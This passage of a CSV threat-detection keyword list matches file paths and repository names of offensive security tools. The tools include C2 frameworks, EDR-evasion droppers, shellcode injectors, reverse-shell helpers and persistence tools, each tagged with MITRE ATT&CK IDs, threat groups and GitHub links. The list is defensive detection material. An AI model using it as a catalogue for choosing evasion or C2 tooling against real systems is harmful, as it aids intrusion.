"*/realvnc-auth-bypass.nse*",".{0,1000}\/realvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Reaper.git*",".{0,1000}\/Reaper\.git.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/Reaper/Reaper.cpp*",".{0,1000}\/Reaper\/Reaper\.cpp.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/ReaperX64.zip*",".{0,1000}\/ReaperX64\.zip.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*/REC2.git*",".{0,1000}\/REC2\.git.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*/Recon-AD.git*",".{0,1000}\/Recon\-AD\.git.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-AllLocalGroups.dll",".{0,1000}\/Recon\-AD\-AllLocalGroups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Computers.dll",".{0,1000}\/Recon\-AD\-Computers\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Domain.dll",".{0,1000}\/Recon\-AD\-Domain\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Groups.dll",".{0,1000}\/Recon\-AD\-Groups\.dll","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-LocalGroups.dll*",".{0,1000}\/Recon\-AD\-LocalGroups\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/Recon-AD-Users.dll*",".{0,1000}\/Recon\-AD\-Users\.dll.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*/recon-archy.git*",".{0,1000}\/recon\-archy\.git.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*/RecycledInjector*",".{0,1000}\/RecycledInjector.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/RecycledInjector.git*",".{0,1000}\/RecycledInjector\.git.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*/RedGuard.git*",".{0,1000}\/RedGuard\.git.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/RedGuard.go*",".{0,1000}\/RedGuard\.go.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/RedGuard_32",".{0,1000}\/RedGuard_32","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/RedGuard_64",".{0,1000}\/RedGuard_64","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/redirector/redirector.py*",".{0,1000}\/redirector\/redirector\.py.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/redis-brute.nse*",".{0,1000}\/redis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redis-info.nse*",".{0,1000}\/redis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/redpeanut.cer*",".{0,1000}\/redpeanut\.cer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanut.git*",".{0,1000}\/RedPeanut\.git.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanut.html*",".{0,1000}\/RedPeanut\.html.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutAgent/*",".{0,1000}\/RedPeanutAgent\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPeanutRP/*",".{0,1000}\/RedPeanutRP\/.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/RedPersist.exe*",".{0,1000}\/RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*/RedPersist.git*",".{0,1000}\/RedPersist\.git.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","1","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*/redpill.ps1*",".{0,1000}\/redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/redpill/bin/*.ps1*",".{0,1000}\/redpill\/bin\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/redsocks.sh*",".{0,1000}\/redsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/redsocks-fw.sh*",".{0,1000}\/redsocks\-fw\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*/RedTeam_toolkit*",".{0,1000}\/RedTeam_toolkit.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*/red-team-scripts*",".{0,1000}\/red\-team\-scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/RedWarden.git*",".{0,1000}\/RedWarden\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*/ReferenceSourceLibraries/Sharpire*",".{0,1000}\/ReferenceSourceLibraries\/Sharpire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/ReflectiveDll.c*",".{0,1000}\/ReflectiveDll\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveDLLInjection/*",".{0,1000}\/ReflectiveDLLInjection\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveLoader.c*",".{0,1000}\/ReflectiveLoader\.c.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/ReflectiveNtdll.git*",".{0,1000}\/ReflectiveNtdll\.git.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/RefleXXion.git*",".{0,1000}\/RefleXXion\.git.{0,1000}","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing 